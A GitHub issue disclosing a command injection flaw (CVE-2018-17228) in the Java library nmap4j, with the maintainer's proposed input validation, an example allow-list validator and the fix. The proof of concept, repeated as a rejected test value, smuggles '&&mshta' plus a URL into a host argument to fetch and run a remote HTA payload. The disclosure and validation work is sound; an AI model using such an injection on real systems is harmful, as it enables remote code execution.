command execution vulnerability #9

Closed
zhutougg opened this issue Sep 19, 2018 · 3 comments

@zhutougg
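Contributor

```java
// Proof of concept from the report: the host argument carries a second command.
String path = "D:\\Nmap";
String op = "-T4 -p4999";
Nmap4j nmap4j = new Nmap4j(path);
// The text after "&&" is not a host specification.
nmap4j.includeHosts("118.24.74.232&&mshta http://118.24.74.232:4999/test.hta");
nmap4j.addFlags(op);
nmap4j.execute();
```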

Here, the original intention of nmap4j.includeHosts() is to receive hosts. When we add custom commands after the host, they will be executed.

@abergmann

CVE-2018-17228 was assigned to this issue.

@narkisr
Owner

narkisr commented Sep 20, 2018

A possible fix is to limit includeHosts to only accept one of the following options:

- Single IP - 192.168.1.1 -> easy regex
- Hostname - www.testhostname.com -> less easy regex
- IP range - 192.168.1.1-20 -> easy regex
- Subnet - 192.168.1.0/24 -> easy regex
- Text file - list-of-ips.txt -> limit files to a string with no spaces

I would still recommend input validation when exposing this library publicly (in an API, for example).
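A sketch of the allow-list validation proposed in the comment above, added here as an example; it is not from the thread and is not the code in commit 06b58aa. The class `HostSpecValidator`, its methods and the exact patterns are assumptions, and the file-name rule is stricter than "no spaces".

```java
import java.util.List;
import java.util.regex.Pattern;

// Hypothetical helper (not part of nmap4j): allow-list check for host specifications.
public class HostSpecValidator {
    private static final String OCTET = "(25[0-5]|2[0-4]\\d|1\\d\\d|[1-9]?\\d)";
    private static final String IPV4 = OCTET + "(\\." + OCTET + "){3}";
    // Hostname label: letters, digits, inner hyphens, 1-63 characters, no leading '-'.
    private static final String LABEL = "[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?";

    private static final List<Pattern> ALLOWED = List.of(
        Pattern.compile(IPV4),                                // single IP: 192.168.1.1
        Pattern.compile(IPV4 + "-" + OCTET),                  // IP range: 192.168.1.1-20
        Pattern.compile(IPV4 + "/(3[0-2]|[12]?\\d)"),         // subnet: 192.168.1.0/24
        Pattern.compile(LABEL + "(\\." + LABEL + ")*"),       // hostname
        Pattern.compile("[A-Za-z0-9_][A-Za-z0-9._-]*\\.txt")  // text file: list-of-ips.txt
    );

    // matches() anchors the whole string, so a valid prefix followed by
    // "&&", ";", "|", spaces or quotes can never pass.
    static boolean isValid(String spec) {
        return spec != null && spec.length() <= 253
            && ALLOWED.stream().anyMatch(p -> p.matcher(spec).matches());
    }

    // Returns the value unchanged, or throws before it reaches the library.
    static String requireValid(String spec) {
        if (!isValid(spec)) {
            throw new IllegalArgumentException("rejected host specification");
        }
        return spec;
    }

    public static void main(String[] args) {
        String[] samples = {  // the maintainer's examples plus the string from the report
            "192.168.1.1", "www.testhostname.com", "192.168.1.1-20",
            "192.168.1.0/24", "list-of-ips.txt",
            "118.24.74.232&&mshta http://118.24.74.232:4999/test.hta",  // rejected
            "-oN", "192.168.1.1 ; id"                                   // rejected
        };
        for (String s : samples) {
            System.out.println((isValid(s) ? "accept  " : "REJECT  ") + s);
        }
    }
}
```

A caller exposing the library through an API would pass `HostSpecValidator.requireValid(userInput)` to `includeHosts()` rather than the raw value.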

narkisr pushed a commit that referenced this issue Sep 27, 2018
@narkisr
Owner

narkisr commented Sep 27, 2018

Validation added in 06b58aa

@narkisr closed this as completed Sep 27, 2018